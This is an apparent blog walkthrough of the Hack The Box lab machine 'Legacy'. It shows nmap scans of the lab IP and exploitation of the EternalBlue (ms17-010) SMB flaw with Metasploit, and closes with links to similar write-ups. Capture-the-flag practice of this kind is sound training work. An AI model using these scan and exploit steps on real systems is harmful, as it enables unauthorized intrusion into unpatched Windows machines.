tsustyle

Aspiring Red Team

Legacy

less than 1 minute read

Port Scanning and General Enumeration (Nmap)

Reading/Resources
- Nmap manual

My initial all ports scan showed 139, 445 and 3389 open. So I targeted those in my targets scan.

nmap -p 139,445,3389 -oN targeted -Pn -T4 -A 10.10.10.4

Also ran a script scan using the --script=vuln switch

nmap -Pn 10.10.10.4. -p 139,445 --script=vuln

Interesting…

Access (Metasploit, ms17-010)

Reading/Resources
- Metasploit
- EternalBlue (ms17-010)

Let’s follow up on ms17-010 lead from nmap using metasploit.

msfconsole search ms17-010

Set your options:

set rhosts 10.10.10.4 set lhost tun0

Fire!

That was easy. Capture the flags.

Share on

Twitter Facebook LinkedIn

You may also enjoy

Doctor

May 02, 2021

‘Doctor’ is an easy rated box on Hack The Box. We’ll use FFuF to discover a hidden registration page, Server Side Template Injection to gain a shell and a public exploit for Spelunker to elevate our privileges

Academy

May 02, 2021

‘Academy’ is an easy rated box on Hack The Box. We’ll use FFuF to discover a hidden page, metasploit to explot Laravel for access and common enumeration for privilege escalation

THM Challenge

February 11, 2021

‘THM Challenge’ is a WebApp that I wrote to send along with my CV to TryHackMe when they were recruiting Content Engineers

Granny & Grandpa

January 27, 2021

Granny & Grandpa are a pair of identical easy rated boxes on Hack the Box. We’ll use metasploit to exploit a buffer overflow in IIS 6.0/WebDav for access and a kernel exploit for privesc